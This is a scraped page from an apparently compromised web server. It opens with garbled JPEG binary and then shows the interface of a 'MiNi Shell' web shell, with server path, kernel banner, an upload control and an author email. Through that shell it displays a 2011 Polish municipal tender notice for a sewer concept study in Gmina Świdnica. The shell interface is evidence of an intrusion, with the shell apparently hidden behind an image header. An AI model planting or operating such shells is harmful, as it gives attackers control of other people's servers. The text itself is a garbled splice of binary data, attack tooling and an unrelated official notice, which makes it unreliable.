JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110519/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110519/120614-N-2011.html

<p class="kh_header"><b>Świdnica: Opracowanie koncepcji budowy kanalizacji sanitarnej na terenie Gminy Świdnica</b><br>
<b>Numer ogłoszenia: 120614 - 2011; data zamieszczenia: 19.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świdnica , ul. Głowackiego 4, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8523067 w. 24, faks 074 8521226w.400.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.swidnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie koncepcji budowy kanalizacji sanitarnej na terenie Gminy Świdnica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie koncepcji budowy kanalizacji sanitarnej na terenie Gminy Świdnica, w skład której musi wchodzić:

Część ogólna
a) przedmiot, cel i zakres opracowania 
b) podstawy opracowania
c) charakterystyka gminy 
d) analiza map, wizje lokalne w terenie, uzgodnienia ze Świdnickim Gminnym Przedsiębiorstwem Komunalnym Sp. z o.o.
e) określenie stanu obecnego gospodarki ściekowej, stanu przygotowania inwestycji i ocena poziomu wyjściowego
f) załączniki do części ogólnej: 
- poglądowe przedstawienie stanu wyjściowego - mapa poglądowa - jako zał. nr 1 do opracowania
- informacja o ilości mieszkańców - zał. nr 2 do opracowania
- dokumentacja wizji lokalnych - zał. nr 3 do opracowania 

Część techniczna 
a)	bilans ilości ścieków
- założenia i dane do bilansu
- obliczenie ilości ścieków
b)	 generalne kierunki rozwiązań budowy systemów i urządzeń kanalizacyjnych
- sieci i przepompownie kanalizacyjne
- oczyszczalnie ścieków
c)	koncepcje rozwiązania gospodarki ściekowej: 
Wariant A - wszystkie miejscowości gminy będą skanalizowane, a ścieki będą  odprowadzane do nowych oczyszczalni na terenie gminy (wariant maksymalny). Ze względu na konfigurację terenu, ograniczenia wynikające z istniejącej infrastruktury oraz aktualny i potencjalny układ sieci kanalizacyjnej ścieki powinny być oczyszczane w dwóch głównych oczyszczalniach (Pszenno i Słotwina) oraz mniejszych zlokalizowanych w Lutomi i Mokrzeszowie. Schemat sieci oraz potencjalne lokalizacje oczyszczalni ścieków przedstawiono na załączonym do opracowania planie sytuacyjnym w skali 1:25000 (plansza 1, zał. nr 10 do SIWZ). W tym wariancie należy rozważyć ponadto możliwość zastąpienia dwóch proponowanych oczyszczalni jedną zlokalizowaną w rejonie Wiśniowej-Niegoszowa z dopuszczeniem możliwości warunkowego zrzutu ścieków z Cukrowi Świdnica w Pszennie.
Wariant B - ścieki z większych miejscowości gminy będą odprowadzane do gminnych oczyszczalni. Dopuszcza się jako rozwiązanie alternatywne w tym wariancie oczyszczanie ścieków z mniejszych i rozproszonych miejscowości w systemach zbiorczych z lokalną oczyszczalnią ścieków lub w oczyszczalniach przydomowych (wariant optymalny). Realizacja tych rozwiązań alternatywnych powinna nastąpić w miarę możliwości finansowych Gminy Świdnica oraz powinna być poprzedzona indywidualną analizą mającą na celu wyboru wariantu optymalnego. 
Układ oczyszczalni ścieków podobny jak w wariancie A, z tym że ze względu na trudności poprowadzenia kolektora odprowadzającego ścieki z Bojanic, Opoczki i Makowic, dodatkowo można rozważyć budowę lokalnej oczyszczalni ścieków w rejonie Makowic. Schemat sieci oraz potencjalne lokalizacje oczyszczalni ścieków przedstawiono na załączonym do opracowania planie sytuacyjnym w skali 1:25000 (plansza 2, zał. nr   11 do SIWZ).
Wariant C - Rezygnacja z inwestycji i odprowadzanie ścieków do oczyszczalni będącej własnością Miasta Świdnica (tzw. wariant 0). Przystępuje się wyłącznie do rozbudowy sytemu kanalizacyjnego w układzie grawitacyjno-tłocznym. Na etapie koncepcji należy rozważyć potencjalną możliwość włączenia sieci kanalizacyjnej z miejscowości Lutomia Górna, Lutomia Dolna, Lutomia Mała i Stachowice do nowej lokalnej oczyszczalni ścieków zlokalizowanej w Lutomi Dolnej, na bazie rozwiązań podobnych do oczyszczalni przydomowych lub tylko rozwiązania oparte na oczyszczalniach przydomowych. 
d) 	dobór średnic kanałów grawitacyjnych w poszczególnych wariantach,
e)	dobór przepompowni i średnic rurociągów tłocznych w poszczególnych wariantach,
f) 	zakres rzeczowy i oszacowanie kosztów inwestycji w poszczególnych wariantach,
g) 	ocena porównawcza kosztów eksploatacyjnych w poszczególnych wariantach,
h) 	ocena porównawcza oddziaływania na środowisko poszczególnych wariantów,
i) 	ocena proponowanych wariantów oraz propozycja wariantu optymalnego,
j) 	koncepcja wynikowa,
k) 	propozycja podziału inwestycji na zadania i etapy realizacyjne. Harmonogram i kolejność realizacji zadań powinny być dostosowane do realnych możliwości pozyskiwania środków zewnętrznych (w tym m.in. Fundusz Spójności, Mechanizm Norweski, fundusze ochrony środowiska) oraz możliwości inwestycyjnych gminy. Realizację głównych przedsięwzięć należy przewidzieć do roku 2015 (termin zakończenia prac nad KPOŚ).
l) 	opracowanie studium wykonalności inwestycji - zał. nr 11 do opracowania,
m)	załączniki do części technicznej
- poglądowe przedstawienie koncepcji budowy kanalizacji sanitarnej w wariancie A - jako zał. nr 4 do opracowania,
- poglądowe przedstawienie koncepcji budowy kanalizacji sanitarnej w wariancie B - jako zał. nr 5 do opracowania, 
- poglądowe przedstawienie koncepcji budowy kanalizacji sanitarnej w wariancie C - jako zał. nr 6 do  opracowania,
- podstawowe informacje o kanalizacji grawitacyjno - pompowej i możliwych alternatywach- zał. nr 7 do opracowania.
- kryteria wyboru sposobów lokalnego oczyszczania ścieków - zał. nr 8 do oprac.
- przykłady budowy przydomowych oczyszczalni ścieków - zał. nr 9 do oprac. 
- proponowane rozwiązanie lokalnych oczyszczalni ścieków - zał. nr 10 do oprac.

Część prawna
Analiza dotycząca formalnych możliwości wyjścia gm. Świdnica z aglomeracji KPOŚK i utworzenia nowej aglomeracji, w oparciu o obowiązujące w tym zakresie przepisy. Analiza winna być uzupełniona o chronologicznie zarysowany tok postępowania wraz z wzorami dokumentów (uchwał wraz z uzasadnieniem, pisma etc.). Utworzenie nowej aglomeracji musi uwzględniać również wymagania stawiane przez fundusze zewnętrzne w zakresie metodologii wyznaczania obszaru aglomeracji. Nowa aglomeracja w ostateczności musi wpisywać się w warianty prowadzenia inwestycji. 

Część graficzna
a) koncepcja budowy kanalizacji sanitarnej w wariancie A - skala 1:25000, plany sytuacyjne sieci kanalizacyjnej w skali 1 : 5000, profile podłużne sieci kanalizacyjnej w skali 1 : 100,5000; 
b) koncepcja budowy kanalizacji sanitarnej w wariancie B - skala 1: 25000, plany sytuacyjne sieci kanalizacyjnej w skali 1 : 5000, profile podłużne sieci kanalizacyjnej w skali 1 : 100,5000;
c) koncepcja budowy kanalizacji sanitarnej w wariancie C - skala 1: 25000, plany sytuacyjne sieci kanalizacyjnej w skali 1 : 5000, profile podłużne sieci kanalizacyjnej w skali 1 : 100,5000.

 Koncepcję należy opracować w oparciu o Wstępne założenia prawno-techniczno-ekonomiczne do opracowania koncepcji kanalizacji Gminy Świdnica opracowane w 2010r.
 Koncepcję w wersji roboczej należy na bieżąco uzgadniać z Zamawiającym oraz przekazać do zaopiniowania Gminnemu Przedsiębiorstwu Komunalnemu Sp. z o.o. 
 Koncepcję należy przekazać Zamawiającemu w 4 egz. wersji papierowej oraz 3 egz. wersji elektronicznej (plik PDF) na płycie CD..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w kwocie: 2.000 zł, słownie: dwa tysiące złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
1) 	jedno zadanie polegające na opracowaniu koncepcji z zakresu gospodarki wodno-ściekowej dla  obszaru o powierzchni i gęstości zaludnienia zbliżonej do obszaru objętego przedmiotowym zamówieniem publicznym;
2) 	2 zadania w zakresie projektów budowlanych z zakresu gospodarki wodno-ściekowej dla sieci o długości min. 35km;
3) 	jedno studium wykonalności inwestycji związane z  budową systemów kanalizacji zbiorczej wraz z budową, rozbudową, przebudową (modernizacją) oczyszczalni ścieków komunalnych, wraz z wnioskiem i załącznikami o dofinansowanie ze środków zewnętrznych, który uzyskał dofinansowanie na kwotę min. 10.000.000,00 złotych (słownie: dziesięć milionów złotych 00,100). 

Wykonawca lub podmioty występujące wspólnie muszą wykazać się łącznym spełnieniem wymagań określonych w pkt. 1, 2 i 3.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli zostanie wykazane dysponowanie osobami zdolnymi do wykonania zamówienia tj.:
1) 1 projektanta branży sanitarnej pełniącego funkcję kierownika zespołu opracowującego koncepcję, posiadającego uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, posiadającego doświadczenie w opracowaniu jako projektant w okresie ostatnich trzech lat projektów budowlanych dla min. 60 km sieci wodno-kanalizacyjnych, w tym. min. 40km sieci kanalizacyjnych wraz z min. 25 przepompowniami ścieków. 
(Zamawiający akceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej wydanych przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej)
2) 1 specjalisty z zakresu gospodarki wodno-ściekowej posiadającego min. 5 letnie doświadczenie w zakresie znajomości funkcjonowania gminnych systemów wodno-kanalizacyjnych oraz systemów współfinansowania zadań z zakresu gospodarki wodno-ściekowej ze środków zewnętrznych i funduszy ochrony środowiska (doradztwo, udział w organach zarządzających lub nadzorczych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) druk OFERTA WYKONAWCY, który należy sporządzić zgodnie z zał. nr 1,
b) druk OŚWIADCZENIE WYKONAWCY, który należy sporządzić zgodnie zał. nr 6,
c) w przypadku wykonawców ubiegających się wspólnie o zamówienie, pełnomocnictwo dla jednego z wykonawców lub osoby trzeciej do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego, podpisane przez wszystkich wykonawców wspólnie ubiegających się o zamówienie,
d) jeżeli wykonawcę reprezentuje pełnomocnik należy załączyć stosowne pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów dołączonych do oferty,
e) załączyć wzór umowy z parafowanymi stronami oraz podpisaną ostatnią stroną umowy - zał. nr 8.
f) potwierdzenie złożenia wadium.
g)oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 pzp - zgodnie z załącznikiem nr 4</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: tak
1.	Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.
2.	Zamawiający dopuszcza zmianę projektanta lub specjalisty z zakresu gospodarki wodno-ściekowej, w sytuacji zdarzeń losowych uniemożliwiających mu pełnienie jego funkcji z zastrzeżeniem że taka zmiana musi nastąpić na osoby, które spełniają warunki określone w SIWZ. Inicjatorem tej zmiany może być wykonawca. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta nie wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy.
3.	Zamawiający dopuszcza zmianę umowy w formie aneksu, w przypadku opóźnień spowodowanych bezczynnością organów administracji publicznej, a także powstałych w związku z działaniami uczestników postępowań administracyjnych, sądowo-administracyjnych, sądowych lub egzekucyjnych, a także opóźnienie powstałe wskutek warunków technicznych uniemożliwiających terminowe wykonanie prac będących przedmiotem umowy. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy.
4.	Zamawiający dopuszcza zmianę Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy. Zmiana taka jest możliwa tylko w przypadku, gdy nowy podwykonawca posiada tożsamą wiedzę i doświadczenie zawodowe, potencjał techniczny oraz osoby zdolne do wykonania zamówienia, a także jest w sytuacji ekonomicznej i finansowej jak dotychczasowy podwykonawca.
5.	Zamawiający dopuszcza rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie, o ile posłużenie się Podwykonawcą doprowadzi do skrócenia terminu wykonania przedmiotu umowy, zmniejszenia należnego Wykonawcy wynagrodzenia. 
6.	Zamawiający dopuszcza zmianę w każdym przypadku gdy zmiana jest korzystna dla Zamawiającego (powoduje skrócenie terminu realizacji umowy, zmniejszenie wartości zamówienia).
7.	Zamawiający dopuszcza zmianę umowy w przypadku zdarzeń losowych, siły wyższej, które będą miały wpływ na treść zawartej umowy i termin realizacji.

Zmiany umowy w stosunku do złożonej oferty mogą nastąpić tylko w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.

Strony mogą odstąpić od umowy w przypadkach określonych w przedmiotowej umowie.

Umowa na wykonanie zamówienia publicznego zostanie zawarta z Wykonawcą, który spełni wszystkie postawione wymagania i którego oferta zostanie wybrana jako najkorzystniejsza.

Umowa zostanie zawarta wg załączonego do niniejszej specyfikacji wzoru (zał. nr 8), na podstawie złożonej oferty Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.swidnica.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Świdnica, ul.B.Glowackiego 4, 58-100 Świdnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2011 godzina 10:00, miejsce: Urząd Gminy Świdnica, ul.B.Glowackiego 4, 58-100 Świdnica, parter punkt informacyjny.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com